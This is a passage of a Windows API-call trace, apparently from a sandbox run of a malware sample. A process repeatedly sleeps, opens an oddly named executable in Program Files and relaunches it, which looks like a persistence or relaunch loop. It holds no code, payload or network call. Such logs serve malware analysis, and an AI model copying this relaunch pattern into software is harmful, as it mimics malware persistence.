(dwMilliseconds=0x1388) [0201.662] Sleep (dwMilliseconds=0x1388) [0201.664] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.664] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d1c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.664] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.664] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c66000) returned 1 [0201.664] NtQueryInformationFile (in: FileHandle=0x1d1c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.664] NtClose (Handle=0x1d1c) returned 0x0 [0201.664] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.664] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d1c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.664] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.664] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0201.665] NtClose (Handle=0x1d1c) returned 0x0 [0201.667] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2230, hThread=0x1d1c, dwProcessId=0xd6c, dwThreadId=0x7f4), hNewToken=0x0) returned 1 [0201.681] Sleep (dwMilliseconds=0x1388) [0201.683] Sleep (dwMilliseconds=0x1388) [0201.684] Sleep (dwMilliseconds=0x1388) [0201.686] Sleep (dwMilliseconds=0x1388) [0201.687] Sleep (dwMilliseconds=0x1388) [0201.689] Sleep (dwMilliseconds=0x1388) [0201.690] Sleep (dwMilliseconds=0x1388) [0201.694] Sleep (dwMilliseconds=0x1388) [0201.695] Sleep (dwMilliseconds=0x1388) [0201.697] Sleep (dwMilliseconds=0x1388) [0201.698] Sleep (dwMilliseconds=0x1388) [0201.700] Sleep (dwMilliseconds=0x1388) [0201.701] Sleep (dwMilliseconds=0x1388) [0201.703] Sleep (dwMilliseconds=0x1388) [0201.707] Sleep (dwMilliseconds=0x1388) [0201.708] Sleep (dwMilliseconds=0x1388) [0201.710] Sleep (dwMilliseconds=0x1388) [0201.711] Sleep (dwMilliseconds=0x1388) [0201.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.713] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a00, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.713] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.713] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0201.713] NtQueryInformationFile (in: FileHandle=0x1a00, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.713] NtClose (Handle=0x1a00) returned 0x0 [0201.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.713] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a00, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.713] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.714] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0201.714] NtClose (Handle=0x1a00) returned 0x0 [0201.716] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2298, hThread=0x1a00, dwProcessId=0x13fc, dwThreadId=0x1004), hNewToken=0x0) returned 1 [0201.732] Sleep (dwMilliseconds=0x1388) [0201.734] Sleep (dwMilliseconds=0x1388) [0201.735] Sleep (dwMilliseconds=0x1388) [0201.739] Sleep (dwMilliseconds=0x1388) [0201.740] Sleep (dwMilliseconds=0x1388) [0201.742] Sleep (dwMilliseconds=0x1388) [0201.743] Sleep (dwMilliseconds=0x1388) [0201.745] Sleep (dwMilliseconds=0x1388) [0201.746] Sleep (dwMilliseconds=0x1388) [0201.748] Sleep (dwMilliseconds=0x1388) [0201.749] Sleep (dwMilliseconds=0x1388) [0201.751] Sleep (dwMilliseconds=0x1388) [0201.755] Sleep (dwMilliseconds=0x1388) [0201.756] Sleep (dwMilliseconds=0x1388) [0201.758] Sleep (dwMilliseconds=0x1388) [0201.759] Sleep (dwMilliseconds=0x1388) [0201.761] Sleep (dwMilliseconds=0x1388) [0201.763] Sleep (dwMilliseconds=0x1388) [0201.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.764] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d50, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.764] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0201.764] NtQueryInformationFile (in: FileHandle=0x1d50, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.764] NtClose (Handle=0x1d50) returned 0x0 [0201.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.765] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d50, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.765] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.765] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0201.765] NtClose (Handle=0x1d50) returned 0x0 [0201.767] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1974, hThread=0x1d50, dwProcessId=0xd4c, dwThreadId=0x2e4), hNewToken=0x0) returned 1 [0201.782] Sleep (dwMilliseconds=0x1388) [0201.787] Sleep (dwMilliseconds=0x1388) [0201.788] Sleep (dwMilliseconds=0x1388) [0201.790] Sleep (dwMilliseconds=0x1388) [0201.791] Sleep (dwMilliseconds=0x1388) [0201.793] Sleep (dwMilliseconds=0x1388) [0201.794] Sleep (dwMilliseconds=0x1388) [0201.801] Sleep (dwMilliseconds=0x1388) [0201.802] Sleep (dwMilliseconds=0x1388) [0201.804] Sleep (dwMilliseconds=0x1388) [0201.805] Sleep (dwMilliseconds=0x1388) [0201.807] Sleep (dwMilliseconds=0x1388) [0201.808] Sleep (dwMilliseconds=0x1388) [0201.810] Sleep (dwMilliseconds=0x1388) [0201.811] Sleep (dwMilliseconds=0x1388) [0201.813] Sleep (dwMilliseconds=0x1388) [0201.814] Sleep (dwMilliseconds=0x1388) [0201.819] Sleep (dwMilliseconds=0x1388) [0201.820] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.821] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1f64, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.821] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.821] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0201.821] NtQueryInformationFile (in: FileHandle=0x1f64, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.821] NtClose (Handle=0x1f64) returned 0x0 [0201.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.821] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1f64, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.821] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.821] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64980) returned 1 [0201.821] NtClose (Handle=0x1f64) returned 0x0 [0201.824] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0xee0, hThread=0x1f64, dwProcessId=0xec8, dwThreadId=0xb84), hNewToken=0x0) returned 1 [0201.842] Sleep (dwMilliseconds=0x1388) [0201.843] Sleep (dwMilliseconds=0x1388) [0201.845] Sleep (dwMilliseconds=0x1388) [0201.846] Sleep (dwMilliseconds=0x1388) [0201.848] Sleep (dwMilliseconds=0x1388) [0201.874] Sleep (dwMilliseconds=0x1388) [0201.875] Sleep (dwMilliseconds=0x1388) [0201.879] Sleep (dwMilliseconds=0x1388) [0201.880] Sleep (dwMilliseconds=0x1388) [0201.882] Sleep (dwMilliseconds=0x1388) [0201.884] Sleep (dwMilliseconds=0x1388) [0201.885] Sleep (dwMilliseconds=0x1388) [0201.886] Sleep (dwMilliseconds=0x1388) [0201.889] Sleep (dwMilliseconds=0x1388) [0201.890] Sleep (dwMilliseconds=0x1388) [0201.891] Sleep (dwMilliseconds=0x1388) [0201.895] Sleep (dwMilliseconds=0x1388) [0201.896] Sleep (dwMilliseconds=0x1388) [0201.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.898] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x228c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.898] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.898] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0201.898] NtQueryInformationFile (in: FileHandle=0x228c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.899] NtClose (Handle=0x228c) returned 0x0 [0201.899] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.899] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x228c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.899] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.899] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65800) returned 1 [0201.899] NtClose (Handle=0x228c) returned 0x0 [0201.901] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1bac, hThread=0x228c, dwProcessId=0x4b4, dwThreadId=0x101c), hNewToken=0x0) returned 1 [0201.916] Sleep (dwMilliseconds=0x1388) [0201.917] Sleep (dwMilliseconds=0x1388) [0201.919] Sleep (dwMilliseconds=0x1388) [0201.920] Sleep (dwMilliseconds=0x1388) [0201.921] Sleep (dwMilliseconds=0x1388) [0201.923] Sleep (dwMilliseconds=0x1388) [0201.924] Sleep (dwMilliseconds=0x1388) [0201.926] Sleep (dwMilliseconds=0x1388) [0201.931] Sleep (dwMilliseconds=0x1388) [0201.932] Sleep (dwMilliseconds=0x1388) [0201.934] Sleep (dwMilliseconds=0x1388) [0201.935] Sleep (dwMilliseconds=0x1388) [0201.937] Sleep (dwMilliseconds=0x1388) [0201.939] Sleep (dwMilliseconds=0x1388) [0201.940] Sleep (dwMilliseconds=0x1388) [0201.941] Sleep (dwMilliseconds=0x1388) [0201.947] Sleep (dwMilliseconds=0x1388) [0201.948] Sleep (dwMilliseconds=0x1388) [0201.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.990] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xee4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.990] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.990] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0201.990] NtQueryInformationFile (in: FileHandle=0xee4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0201.990] NtClose (Handle=0xee4) returned 0x0 [0201.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.990] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xee4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0201.990] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0201.990] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0201.991] NtClose (Handle=0xee4) returned 0x0 [0201.992] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1d8c, hThread=0xee4, dwProcessId=0x1024, dwThreadId=0xf24), hNewToken=0x0) returned 1 [0202.006] Sleep (dwMilliseconds=0x1388) [0202.038] Sleep (dwMilliseconds=0x1388) [0202.039] Sleep (dwMilliseconds=0x1388) [0202.043] Sleep (dwMilliseconds=0x1388) [0202.045] Sleep (dwMilliseconds=0x1388) [0202.046] Sleep (dwMilliseconds=0x1388) [0202.048] Sleep (dwMilliseconds=0x1388) [0202.049] Sleep (dwMilliseconds=0x1388) [0202.051] Sleep (dwMilliseconds=0x1388) [0202.052] Sleep (dwMilliseconds=0x1388) [0202.054] Sleep (dwMilliseconds=0x1388) [0202.055] Sleep (dwMilliseconds=0x1388) [0202.059] Sleep (dwMilliseconds=0x1388) [0202.061] Sleep (dwMilliseconds=0x1388) [0202.063] Sleep (dwMilliseconds=0x1388) [0202.064] Sleep (dwMilliseconds=0x1388) [0202.066] Sleep (dwMilliseconds=0x1388) [0202.067] Sleep (dwMilliseconds=0x1388) [0202.069] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.069] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, 